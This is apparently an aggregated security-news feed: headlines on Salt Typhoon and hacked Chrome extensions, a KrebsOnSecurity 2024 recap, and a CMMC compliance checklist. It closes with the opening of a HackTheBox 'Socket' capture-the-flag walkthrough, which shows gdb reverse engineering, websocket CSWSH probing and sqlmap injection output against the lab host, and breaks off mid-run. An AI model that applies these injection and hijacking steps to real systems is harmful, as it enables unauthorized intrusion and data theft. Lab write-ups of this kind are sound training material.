Verizon says it has secured its network after breach by China-linked Salt Typhoon group

U.S. telecom giant Verizon says it has secured its network after being targeted by the China-linked Salt Typhoon cyberespionage group. In a statement given to TechCrunch on Sunday, Verizon spokesperson Richard Young said the company has “contained the cyber incident brought on by this nation-state threat actor,” and that it has not detected any threat actor […]

© 2024 TechCrunch. All rights reserved. For personal use only.

Security News | TechCrunch – ​Read More

Critical Flaw Exposes Four-Faith Routers to Remote Exploitation

SUMMARY: VulnCheck has discovered a critical new vulnerability (CVE-2024-12856) affecting Four-Faith industrial routers (F3x24 and F3x36), with evidence…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More

Happy 15th Anniversary, KrebsOnSecurity!

Image: Shutterstock, Dreamansions.

KrebsOnSecurity.com turns 15 years old today! Maybe it’s indelicate to celebrate the birthday of a cybercrime blog that mostly publishes bad news, but happily many of 2024’s most engrossing security stories were about bad things happening to bad guys. It’s also an occasion to note that despite my publishing fewer stories than ever this past year, we somehow managed to attract near record levels of readership (thank you!).

In case you missed any of them, here’s a recap of 2024’s most-read stories. In January, KrebsOnSecurity told the story of a Canadian man who was falsely charged with larceny and lost his job after becoming the victim of a complex e-commerce scam known as triangulation fraud. This can occur when you buy something online — from a seller on Amazon or eBay, for example — but the seller doesn’t actually own the item for sale. Instead, they purchase the item using stolen payment card data and your shipping address. In this scam, you receive what you ordered, and the only party left to dispute the transaction is the owner of the stolen payment card.

Triangulation fraud. Image: eBay Enterprise.

March featured several investigations into the history of various people-search data broker services. One story exposed how the Belarusian CEO of the privacy and data removal service OneRep had actually founded dozens of people-search services, including many that OneRep was offering to remove people from for a fee. That story quickly prompted Mozilla to terminate its partnership with OneRep, which Mozilla had bundled as a privacy option for Firefox users.

A story digging into the consumer data broker Radaris found its CEO was a fabricated identity, and that the company’s founders were Russian brothers in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites.

Radaris repeatedly threatened to sue KrebsOnSecurity unless that publication was retracted in full, alleging that it was replete with errors both factual and malicious. Instead, we doubled down and published all of the supporting evidence that wasn’t included in the original story, leaving little room for doubt about its conclusions. Fittingly, Radaris now pimps OneRep as a service when consumers request that their personal information be removed from the data broker’s website.

Easily the longest story this year was an investigation into Stark Industries Solutions, a large, mysterious new Internet hosting firm that materialized when Russia invaded Ukraine. That piece revealed how Stark was being used as a global proxy network to conceal the true source of cyberattacks and disinformation campaigns against enemies of Russia.

The homepage of Stark Industries Solutions.

Much of my summer was spent reporting a story about how advertising and marketing firms have created a global free-for-all where anyone can track the daily movements and associations of hundreds of millions of mobile devices, thanks to the ubiquity of mobile location data that is broadly and cheaply available.

Research published in September explored the dark nexus between harm groups and cybercrime communities consumed with perpetrating financial fraud. That analysis found an increasing number of young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others.

One focus of that story was a Canadian cybercriminal who used the nickname Judische. Identified by the Mandiant as one of the most consequential threat actors of 2024, Judische was responsible for a hacking rampage that exposed private information on hundreds of millions of Americans.  That story withheld Judische’s real name, but the reporting came in handy in late October when a 25-year-old Canadian man named Connor Riley Moucka was arrested and charged with 20 criminal counts connected to the Snowflake data extortions.

A surveillance photo of Connor Riley Moucka, a.k.a. “Judische” and “Waifu,” dated Oct 21, 2024, 9 days before Moucka’s arrest. This image was included in an affidavit filed by an investigator with the Royal Canadian Mounted Police (RCMP).

In November, KrebsOnSecurity published a profile of Judische’s accomplice — a hacker known as Kiberphant0m — detailing how Kiberphant0m had left a trail of clues strongly suggesting that they are or recently were a U.S. Army soldier stationed in South Korea.

My reporting in December was mainly split between two investigations. The first profiled Cryptomus, a dodgy cryptocurrency exchange allegedly based in Canada that has become a major payment processor and sanctions evasion platform for dozens of Russian exchanges and cybercrime services online.

How to Lose a Fortune with Just One Bad Click told the sad tales of two cryptocurrency heist victims who were scammed out of six and seven figures after falling for complex social engineering schemes over the phone. In these attacks, the phishers abused at least four different Google services to trick targets into believing they were speaking with a Google representative, and into giving thieves control over their account with a single click. Look for a story here in early 2025 that will explore the internal operations of these ruthless and ephemeral voice phishing gangs.

Before signing off for 2024, allow me to remind readers that the reporting we’re able to provide here is made possible primarily by the ads you may see at the top of this website. If you currently don’t see any ads when you load this website, please consider enabling an exception in your ad blocker for KrebsOnSecurity.com. There is zero third-party content on this website, apart from the occasional Youtube video embedded as part of a story. More importantly, all of our ads are static images or GIFs that are vetted by me and served in-house directly.

Fundamentally, my work is supported and improved by your readership, tips, encouragement and, yes, criticism. So thank you for that, and keep it coming, please.

Here’s to a happy, healthy, wealthy and wary 2025. Hope to see you all again in the New Year!

Krebs on Security – ​Read More

Study Finds AI Can Guess Crypto Seed Phrases in 0.02 Seconds

IN THIS ARTICLE, YOU WILL LEARN: NFT-focused news website NFTEvening and the NFT market’s data and analytics-based platform…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More

16 Chrome Extensions Hacked, Exposing Over 600,000 Users to Data Theft

A new attack campaign has targeted known Chrome browser extensions, leading to at least 16 extensions being compromised and exposing over 600,000 users to data exposure and credential theft.
The attack targeted publishers of browser extensions on the Chrome Web Store via a phishing campaign and used their access permissions to insert malicious code into legitimate extensions in order to steal

The Hacker News – ​Read More

The CMMC Countdown, Part 4

The CMMC Countdown, Part 4

The CMMC Final Rule became effective on December 16, 2024. We will finish reviewing the remaining five-pointers to ensure we can obtain a conditional CMMC certificate if we cannot achieve a 110 score.

CMMC Action Plan continued

PS.L2-3.9.2

Ensure that organizational systems containing CUI are protected during and after personnel actions such as terminations and transfers.

Determine if:

[a] a policy and/or process for terminating system access and any credentials coincident with personnel actions is established;
[b] system access and credentials are terminated consistent with personnel actions such as termination or transfer; and
[c] the system is protected during and after personnel transfer actions.

Consider creating onboarding, offboarding, and transfer procedures. These procedures should define how all access is revoked upon termination and how some access is granted and revoked during a transfer. For a transfer, personnel should gain access to CUI when they transfer into a role that requires it. Conversely, access to CUI should be revoked when they transfer to a role where CUI access is unnecessary.

PE.L2-3.10.1

Limit physical access to organizational systems, equipment, and the respective operating environments to authorized individuals.

Determine if:

[a] authorized individuals allowed physical access are identified;
[b] physical access to organizational systems is limited to authorized individuals;
[c] physical access to equipment is limited to authorized individuals; and
[d] physical access to operating environments is limited to authorized individuals

Consider having a separate CMMC environment, as mentioned in previous posts. You could show your access list if you have an access control system, like a badge reader. Consider writing a procedure that describes how the access list is reviewed and updated. Consider maintaining an inventory list of the CUI devices in your CMMC environment and writing a procedure for updating that list. You should be able to leverage your procedures from the AC domain to show how access is granted to these devices. The inventory list should also identify the networking equipment and security systems and how access to them is restricted to the personnel responsible for maintaining them, such as the IT team.

PE.L2-3.10.2

Protect and monitor the physical facility and support infrastructure for organizational systems.

Determine if:

[a] the physical facility where organizational systems reside is protected;
[b] the support infrastructure for organizational systems is protected;
[c] the physical facility where organizational systems reside is monitored; and
[d] the support infrastructure for organizational systems is monitored.

We can show the access logs generated by the access control system identified in PE.L2-3.10.1. If you rely on a physical key and a video system, like Ring, consider creating a key distribution log, filling out the log to check out the key, and collecting the video logs. That way, you can show who is authorized to lock and unlock the door and show video surveillance at the door.

CA.L2-3.12.1

Periodically assess the security controls in organizational systems to determine if the controls are effective in their application.

Determine if:
We can show the access logs generated by the access control system identified in PE.L2-3.10.1. If you rely on a physical key and a video system like Ring, consider creating a form where keys are checked in and out and showing the video logs.
[a] the frequency of security control assessments is defined; and
[b] security controls are assessed with the defined frequency to determine if the controls are effective in their application.

The CMMC controls must be certified by a C3PAO every three years. Within those three years, a yearly SPRS score must be submitted. Consider doing a quarterly self-assessment for one-fourth of the CMMC controls or a yearly one for one-third. You will have self-assessed each control after one year or three years, whichever frequency you choose. Consider defining the schedule in the SSP. Keep a formal record of each self-assessment and consider having them signed by your leadership. Document any findings in the POAM.

CA.L2-3.12.3

Monitor security controls on an ongoing basis to ensure the continued effectiveness of the controls.

Determine if:

[a] security controls are monitored on an ongoing basis to ensure the continued effectiveness of those controls.

Consider setting up monitoring tools that automatically assess your organization’s security posture. You can use tools like Microsoft Defender XDR, Microsoft Intune, Nessus, and Greenbone.

SC.L2-3.13.1

Monitor, control, and protect communications (i.e., information transmitted or received by organizational systems) at the external boundaries and key internal boundaries of organizational systems.

Determine if:

[a] the external system boundary is defined;
[b] key internal system boundaries are defined;
[c] communications are monitored at the external system boundary;
[d] communications are monitored at key internal boundaries;
[e] communications are controlled at the external system boundary;
[f] communications are controlled at key internal boundaries;
[g] communications are protected at the external system boundary; and
[h] communications are protected at key internal boundaries.

Consider creating a drawing that describes your organizational network. An external system boundary could be your on-site firewall and VPN connection for remote users. Your internal system boundaries could include any VLANs that segregate system resources. The monitoring could be syslog events sent to a SIEM. The controls could be your firewall rules and network ACLs. The protection could be SSL and VPN encryption. Consider implementing web content filtering as an additional layer.

SC.L2-3.13.2

Employ architectural designs, software development techniques, and systems engineering principles that promote effective information security within organizational systems.

Determine if:

[a] architectural designs that promote effective information security are identified;
[b] software development techniques that promote effective information security are identified;
[c] systems engineering principles that promote effective information security are identified;
[d] identified architectural designs that promote effective information security are employed;
[e] identified software development techniques that promote effective information security are employed; and
[f] identified systems engineering principles that promote effective information security are employed.

Consider defining the system architecture for your CMMC environment and a list of security principles and requirements. The principles should define how environmental changes will maintain its security posture. The requirements should be testable and verifiable. For example, a new cloud environment must have a valid FedRAMP or SOC 2 Type II certification, and a firewall and VPN must have valid FIPS 140-3 certification.

SI.L2-3.14.1

Identify, report, and correct system flaws in a timely manner.

Determine if:

[a] the time within which to identify system flaws is specified;
[b] system flaws are identified within the specified time frame;
[c] the time within which to report system flaws is specified;
[d] system flaws are reported within the specified time frame;
[e] the time within which to correct system flaws is specified; and
[f] system flaws are corrected within the specified time frame.

Consider defining a procedure with SLAs. For example, the IT team will:

  • Subscribe to the CISA Cybersecurity Alerts & Advisories.
  • Monitor the email inbox where the emails are sent at least twice a week
  • Create a remediation task for any relevant vulnerabilities.
    • Low CVE vulnerabilities will be due in six months
    • Whereas critical CVEs will be due in 30 days.

SI.L2-3.14.2

Provide protection from malicious code at designated locations within organizational systems.

Determine if:

[a] designated locations for malicious code protection are identified; and
[b] protection from malicious code at designated locations is provided.

Install antivirus software on every machine that contains CUI. Also, consider adding a security subscription to your cloud storage so it performs antivirus scans on your files stored in the cloud.

SI.L2-3.14.3

Monitor system security alerts and advisories and take action in response.

Determine if:

[a] response actions to system security alerts and advisories are identified;
[b] system security alerts and advisories are monitored; and
[c] actions in response to system security alerts and advisories are taken.

Consider subscribing to the CISA Cybersecurity Alerts & Advisories. Your security tools, like Microsoft Defender XDR, might have advisory alerts, but you must configure them. As mentioned, you will want to create remediation tasks to show you are responding to advisories.

AU.L2-3.3.5

Correlate audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity.

Determine if:

[a] audit record review, analysis, and reporting processes for investigation and response to indications of unlawful, unauthorized, suspicious, or unusual activity are defined; and
[b] defined audit record review, analysis, and reporting processes are correlated.

Consider setting up a SIEM and sending all your logs there. The SIEM should provide you with reports that can help detect unwanted activity. Review the reports periodically. Consider a monthly review since quarterly reviews may be too long, and weekly reviews might be too often and tiring.

CM.L2-3.4.5

Define, document, approve, and enforce physical and logical access restrictions associated with changes to organizational systems.

Determine if:

[a] physical access restrictions associated with changes to the system are defined;
[b] physical access restrictions associated with changes to the system are documented;
[c] physical access restrictions associated with changes to the system are approved;
[d] physical access restrictions associated with changes to the system are enforced;
[e] logical access restrictions associated with changes to the system are defined;
[f] logical access restrictions associated with changes to the system are documented;
[g] logical access restrictions associated with changes to the system are approved; and
[h] logical access restrictions associated with changes to the system are enforced.

Consider putting networking equipment in a locked networking room only accessible by authorized personnel like the IT team. Also, administrator accounts for the IT team should be created, and permission should only be given to those accounts to make configuration changes.

CM.L2-3.4.6

Employ the principle of least functionality by configuring organizational systems to provide only essential capabilities.

Determine if:

[a] essential system capabilities are defined based on the principle of least functionality; and
[b] the system is configured to provide only the defined essential capabilities.

There should be regular user accounts and administrator accounts. Everyone will have a regular user account with no privileges to modify the CMMC environment. Only the authorized personnel, like the IT team, will have administrator accounts. There should be a super administrator (who can make any change) and limited administrators (with limited privileges based on job role).

CM.L2-3.4.7

Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.

Determine if:

[a] essential programs are defined;
[b] the use of nonessential programs is defined;
[c] the use of nonessential programs is restricted, disabled, or prevented as defined;
[d] essential functions are defined;
[e] the use of nonessential functions is defined;
[f] the use of nonessential functions is restricted, disabled, or prevented as defined;
[g] essential ports are defined;
[h] the use of nonessential ports is defined;
[i] the use of nonessential ports is restricted, disabled, or prevented as defined;
[j] essential protocols are defined;
[k] the use of nonessential protocols is defined;
[l] the use of nonessential protocols is restricted, disabled, or prevented as defined;
[m] essential services are defined;
[n] the use of nonessential services is defined; and
[o] the use of nonessential services is restricted, disabled, or prevented as defined.

Consider having software that blocks blacklisted programs, functions, ports, protocols, and services. Another approach is configuring the computer with the bare minimum of programs, functions, ports, protocols, and services. Put restrictions that will require an administrator to approve any modifications.

CM.L2-3.4.8

Apply deny-by-exception (blacklisting) policy to prevent the use of unauthorized software or deny-all, permit-by-exception (whitelisting) policy to allow the execution of authorized software.

Determine if:

[a] a policy specifying whether whitelisting or blacklisting is to be implemented is specified;
[b] the software allowed to execute under whitelisting or denied use under blacklisting is specified; and
[c] whitelisting to allow the execution of authorized software or blacklisting to prevent the use of unauthorized software is implemented as specified.

Blacklisting is the easiest, while whitelisting is the more secure solution. Tools like Microsoft Defender XDR can prevent the execution of blacklisted software. You can use Software Restriction Policies in Windows to whitelist or blacklist too.

IA.L2-3.5.10

Store and transmit only cryptographically-protected passwords.

Determine if:

[a] passwords are cryptographically protected in storage; and
[b] passwords are cryptographically protected in transit

Consider using an identity provider (IdP), like Microsoft Entra ID, to perform the cryptography for you. Use SSO, SAML, or OpenID Connect to use your IdP to log into any third-party and custom applications.

MA.L2-3.7.5

Require multifactor authentication to establish nonlocal maintenance sessions via external network connections and terminate such connections when nonlocal maintenance is complete.

Determine if:

[a] multifactor authentication is used to establish nonlocal maintenance sessions via external network connections; and
[b] nonlocal maintenance sessions established via external network connections are terminated when nonlocal maintenance is complete.

Ensure that MFA is enabled for remote support solutions and remote desktop protocols. For connections that require SSH, consider limiting access from a machine that requires MFA to authenticate.

MP.L2-3.8.7

Control the use of removable media on system components.

Determine if:

[a] the use of removable media on system components is controlled.

The simplest solution is to block removable media. If removable media is necessary, limit mounting the media to an administrator account.

RA.L2-3.11.2

Scan for vulnerabilities in organizational systems and applications periodically and when new vulnerabilities affecting those systems and applications are identified.

Determine if:

[a] the frequency to scan for vulnerabilities in organizational systems and applications is defined;
[b] vulnerability scans are performed on organizational systems with the defined frequency;
[c] vulnerability scans are performed on applications with the defined frequency;
[d] vulnerability scans are performed on organizational systems when new vulnerabilities are identified; and
[e] vulnerability scans are performed on applications when new vulnerabilities are identified.

Consider using vulnerability scanning software, like Nessus, and perform vulnerability scans on the operating systems and installed applications. If you are developing CUI software, consider using a vulnerability scanner, such as Snyk, for application libraries, like npm and pip packages.

SC.L2-3.13.5

Implement subnetworks for publicly accessible system components that are physically or logically separated from internal networks.

Determine if:

[a] publicly accessible system components are identified; and
[b] subnetworks for publicly accessible system components are physically or logically separated from internal networks.

Create a separate VLAN and subnet for systems that can be accessed from the Internet. Ideally, this network should be separated by a DMZ and/or a firewall and cannot access internal, non-public networks.

SC.L2-3.13.6

Deny network communications traffic by default and allow network communications traffic by exception (i.e., deny all, permit by exception).

Determine if:

[a] network communications traffic is denied by default; and
[b] network communications traffic is allowed by exception.

The firewall rule set should have deny as the last rule. The preceding rules should allow specific traffic.

SC.L2-3.13.15

Protect the authenticity of communications sessions.

Determine if:

[a] the authenticity of communications sessions is protected.

All web traffic should be HTTPS with a valid TLS certificate. HTTP traffic should be blocked. SSL or a similar encryption technology should encrypt VPN traffic.

SI.L2-3.14.4

Update malicious code protection mechanisms when new releases are available.

Determine if:
[a] malicious code protection mechanisms are updated when new releases are available.

Your antivirus software should check for updates at least daily though hourly is best and automatically update.

SI.L2-3.14.6

Monitor organizational systems, including inbound and outbound communications traffic, to detect attacks and indicators of potential attacks.

Determine if:

[a] the system is monitored to detect attacks and indicators of potential attacks;
[b] inbound communications traffic is monitored to detect attacks and indicators of potential attacks; and
[c] outbound communications traffic is monitored to detect attacks and indicators of potential attacks.

Consider using a combination of SIEM, MDR, and XDR to analyze your logs and detect potential threats and attacks.

Before you go

Wishing you much success in your CMMC certification journey.

Sign up for my mailing list at https://miguelacallesmba.medium.com/subscribe

Secjuice – ​Read More

HTB Socket Walkthrough

HTB Socket Walkthrough

And welcome back, my friends, to this relatively simple but very interesting BOX, with a small reverse engineering section that I love so much and that I hope you will, too. Also interesting is the part about privesc, in which ChatGPT, as has recently happened, had a small contribution. But let’s not get lost in chatter, and let’s get started.

The nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-20 15:18 EDT
Nmap scan report for 10.10.11.206
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://qreader.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.39 seconds

OK. The usual portal seems to have an unusual domain for an HTB BOX. Let’s add it in the /etc/hosts file and try to navigate it.

HTB Socket Walkthrough

Wappalyzer identifies the technologies used in the portal, but at the moment, this information cannot help me that much.

HTB Socket Walkthrough

The portal displays QRCode conversion and processing functions. There are also two versions of the system in a software format for windows and linux that can be downloaded and use4d from a local computer. It looks like my first investigation will be one of my favorite activities, a good reverse engineering session. But first, let’s start the program to understand at least the basic operation.

HTB Socket Walkthrough

The program is a user interface system. If we try the sample file supplied with the executable, it is possible to trace the text contained within the QRCode.

kavigihan

Let’s immediately disassemble the application to understand if there is something hidden inside that can be useful. The program initialization block (you can reach it by clicking on the start function in the appropriate box) shows that the application main is started.

HTB Socket Walkthrough

So let’s move to main (always selecting the function from the appropriate box) and following the “jmp” to the specific address. We find ourselves in the heart of the application.

HTB Socket Walkthrough

Looking at the flow itself, I understand that it could take me a long time just to understand what it does by reading the code (branches are enough), so I start debugging and follow a single flow, at least I’m sure I will quickly analyze the correct flow.

HTB Socket Walkthrough

Going with the flow, I soon get to a function call that immediately displays the dialog. Strangely, the variable preceding it points to the executable I’m already debugging.

HTB Socket Walkthrough

I restarted and proceeded with a new debug, this time by entering the function that started the app form. Apparently, an application forks.

HTB Socket Walkthrough

We should have two processes of the same app.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ps -aux | grep qreader
in7rud3r 36498 5.7 0.0 2740 988 ? t 19:38 0:01 /home/in7rud3r/Downloads/app/qreader
in7rud3r 36548 2.3 0.9 962756 162472 ? Wl 19:38 0:00 /home/in7rud3r/Downloads/app/qreader
in7rud3r 36624 0.0 0.0 6304 2072 pts/5 S+ 19:38 0:00 grep --color=auto qreader

A block of code later, however, waits for the second thread to exit.

HTB Socket Walkthrough

Since I can’t do much in this instance, it will be better to start the app without debugging and stick to the process being started.

Once started, we check who is the father of whom. The ID of the process should suffice (the older one is the child), but we leave nothing to chance.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ pstree -p | grep qreader
           |              |-lightdm(921)-+-xfce4-session(955)-+-Thunar(1084)-+-qreader(38483)---qreader(38492)-+-{qreader}(38494)
           |              |              |                    |              |                                 |-{qreader}(38495)
           |              |              |                    |              |                                 |-{qreader}(38496)
           |              |              |                    |              |                                 |-{qreader}(38497)
           |              |              |                    |              |                                 |-{qreader}(38498)
           |              |              |                    |              |                                 `-{qreader}(38499)
                                                                                                                                                 
┌──(in7rud3r㉿in7rud3r-kali)-[~/Dropbox/hackthebox]
└─$ ps -aux | grep qreader  
in7rud3r   38483  2.4  0.0   2740   980 ?        S    19:45   0:01 /home/in7rud3r/Downloads/app/qreader
in7rud3r   38492  0.5  0.9 962792 162492 ?       Sl   19:45   0:00 /home/in7rud3r/Downloads/app/qreader
in7rud3r   38812  0.0  0.0   6304  2096 pts/5    R+   19:46   0:00 grep --color=auto qreader

OK. The opening and writing functions should use some imported standard IO functions, but I can’t find anything in the import section. I should find the button handles to retrieve the image encoding and decoding functions. Then there are the two function versions that update in the “about” menu, which return a connection error message. Let’s try to find the error strings to trace the calls it tries to make.

HTB Socket Walkthrough

The strings are there, but I can’t debug them, and after a few attempts to add a breakpoint that doesn’t activate. I decided on a more theoretical approach. The error message is clearly an indication of a bad network connection, so I’m aiming to check portions of code in which network features are exploited. After a few tries, I identified the “socket” function. For a change, I use a slightly less user-friendly tool, gdb.

I started the application and identifed the process that is being duplicated.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ pstree -ap | grep qreader                                                  
  |   |   `-qreader,10054
  |   |       `-qreader,10059
  |   |           |-{qreader},10060
  |   |           |-{qreader},10061
  |   |           |-{qreader},10062
  |   |           |-{qreader},10063
  |   |           |-{qreader},10064
  |   |           `-{qreader},10065
  |   |   |-grep,10736 --color=auto qreader

Let’s attach it the process via gdb.

┌──(in7rud3r㉿in7rud3r-kali)-[~/Downloads/app]
└─$ sudo gdb --pid 10059
GNU gdb (Debian 13.2-1) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
Attaching to process 10059
[New LWP 10060]
[New LWP 10061]
[New LWP 10062]
[New LWP 10063]
[New LWP 10064]
[New LWP 10065]

warning: .dynamic section for "/lib/x86_64-linux-gnu/libelf.so.1" is not at the expected address (wrong library or version mismatch?)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
0x00007fed5b78dfff in __GI___poll (fds=0x1e56f90, nfds=5, timeout=-1) at ../sysdeps/unix/sysv/linux/poll.c:29
29      ../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
(gdb) 

I put a breakpoint on the “socket” function and let the program run.

(gdb) b socket
Breakpoint 1 at 0x7fed4acb2d60 (3 locations)
(gdb) c
Continuing.

At this point, let’s trigger the connection event on the interface through one of the two menu items and see if something is activated in the debugger.

[New Thread 0x7fed317fe6c0 (LWP 13226)]
[Switching to Thread 0x7fed317fe6c0 (LWP 13226)]

Thread 8 "qreader" hit Breakpoint 1.3, __GI_socket () at ../sysdeps/unix/syscall-template.S:120
120     ../sysdeps/unix/syscall-template.S: No such file or directory.

Perfect. The break has been activated. Now, we can investigate the various calls that follow one another proceeding step by step. The new socket initialization function doesn’t carry much additional information, especially by displaying the parameters that are passed to the function.

(gdb) info args
No arguments.

Proceeding step by step (command “s“), we will finally arrive at the “open_socket” call, which will start showing us some more parameters.

(gdb) s
[New Thread 0x7fed30ffd6c0 (LWP 15775)]
122     in ../sysdeps/unix/syscall-template.S
[...]
open_socket (type=type@entry=GETFDHST, key=key@entry=0x7fed5b82bb87 "hosts", keylen=keylen@entry=6) at ./nscd/nscd_helper.c:172
172     ./nscd/nscd_helper.c: No such file or directory.
(gdb) info args
type = GETFDHST
key = 0x7fed5b82bb87 "hosts"
keylen = 6

This will reappear after performing a few more steps, and this time with some additional information.

0x00007fed5b7dd739 in open_socket (type=type@entry=GETAI, key=key@entry=0x7fed403e3b30 "ws.qreader.htb", keylen=keylen@entry=15)
    at ./nscd/nscd_helper.c:171
171     in ./nscd/nscd_helper.c
(gdb) info args
type = GETAI
key = 0x7fed403e3b30 "ws.qreader.htb"
keylen = 15

Another domain that if I don’t put it in my /etc/hosts file, I will never reach it. Let’s add it and see what happens in the application.
Bingo, once you enter the domain, the calls start going through.

I then started packet sniffing on my network with wireshark.

HTB Socket Walkthrough

After quickly analyzing the packets, we found that after a quick sync and ack, the client made the real call, and we also found a lot of interesting information.

HTB Socket Walkthrough

OK. Pay attention now. To capture packets and be able to edit them, I need burpsuite. To make the program, I used the burpsuite proxy. I tried with environment variables and so on, but the process fork probably interfered with the environment variables. I then bypassed the problem by performing these simple steps:

  1. In the /etc/hosts file, I set my machine to respond to the ws.qreader.htb domain
  2. The call is made on port 5789, so I set up a new proxy on burpsuite to answer local address 127.0.0.1 on port 5789 (this way, calls are made directly to burpsuite)
  3. Always in the proxy, I set the redirection of any call received at the address 10.10.11.206 on port 5789.

In this way, I can check all the calls made. And in fact:

Now, I can take a closer look at the calls. I don’t know exactly how to perform a websocket attack, so I take a quick peek around and through HackTricks (now one of the penetration testers must-have tools)

Cross-site WebSocket hijacking (CSWSH) – HackTricks
HTB Socket Walkthrough

This is an interesting git repository.

GitHub – PalindromeLabs/STEWS: A Security Tool for Enumerating WebSockets
A Security Tool for Enumerating WebSockets. Contribute to PalindromeLabs/STEWS development by creating an account on GitHub.
HTB Socket Walkthrough

Let’s take some time to understand how it works and then try it.

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/attack/git/STEWS/vuln-detect]
└─$ python3 STEWS-vuln-detect.py -u ws.qreader.htb:5789 -n -1
   Testing ws://ws.qreader.htb:5789
>>>Note: ws://ws.qreader.htb:5789 allowed http or https for origin
>>>Note: ws://ws.qreader.htb:5789 allowed null origin
>>>Note: ws://ws.qreader.htb:5789 allowed unusual char (possible parse error)
>>>VANILLA CSWSH DETECTED: ws://ws.qreader.htb:5789 likely vulnerable to vanilla CSWSH (any origin)
====Full list of vulnerable URLs===
['ws://ws.qreader.htb:5789']
['>>>VANILLA CSWSH DETECTED: ws://ws.qreader.htb:5789 likely vulnerable to vanilla CSWSH (any origin)']

I don’t believe it. It was too simple. Let’s investigate this vulnerability and how it will be exploited.

I have tried various ways to perform the exploit but without success. Finally, peeking in the HTB forum, I understand that the exploit is of type SQLi. Bad story, also in this case activating the sqlmap on websocket protocol will not be easy. Luckily, there is a script that can help me.

Automating Blind SQL injection over WebSocket
Recently I have come across several CTF challenges on SQL injection over WebSocket. So I decided to build a vulnerable WebSocket web app for others to practice blind SQL injection over WebSocket. I spent a day building this on NodeJS from scratch which helped me better understand WebSocket implement…
HTB Socket Walkthrough

After a quick look at the code, I only replaced the payload to avoid a double quote breaking the JSON string (as recommended in the comment).

message = unquote(payload).replace('"','\"') # replacing " with ' to avoid breaking JSON structure

And fire to the dust!

┌──(in7rud3r㉿in7rud3r-kali)-[~/…/hackthebox/_10.10.11.206 - Socket (lin)/attack/py]
└─$ sqlmap -u 'http://localhost:8081/version?version=0.0.2' --batch --level 5 --risk 3 --dbs
        ___
       __H__                                                                                                                         
 ___ ___[(]_____ ___ ___  {1.6.7#stable}                                                                                             
|_ -| . ["]     | .'| . |                                                                                                            
|___|_  [']_|_|_|__,|  _|                                                                                                            
      |_|V...       |_|   https://sqlmap.org                                                                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:14:57 /2023-06-25/

[21:14:57] [INFO] testing connection to the target URL
[21:14:57] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.5')
[21:14:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:14:57] [INFO] testing if the target URL content is stable
[21:14:58] [INFO] target URL content is stable
[21:14:58] [INFO] testing if GET parameter 'version' is dynamic
[21:14:58] [INFO] GET parameter 'version' appears to be dynamic
[21:14:58] [WARNING] heuristic (basic) test shows that GET parameter 'version' might not be injectable
[21:14:59] [INFO] testing for SQL injection on GET parameter 'version'
[21:14:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:15:02] [INFO] GET parameter 'version' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[21:15:11] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite' 
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[21:15:11] [INFO] testing 'Generic inline queries'
[21:15:11] [INFO] testing 'SQLite inline queries'
[21:15:12] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[21:15:12] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[21:15:13] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[21:15:20] [INFO] GET parameter 'version' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable 
[21:15:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:15:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:15:20] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:15:22] [INFO] target URL appears to have 4 columns in query
[21:15:23] [INFO] GET parameter 'version' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
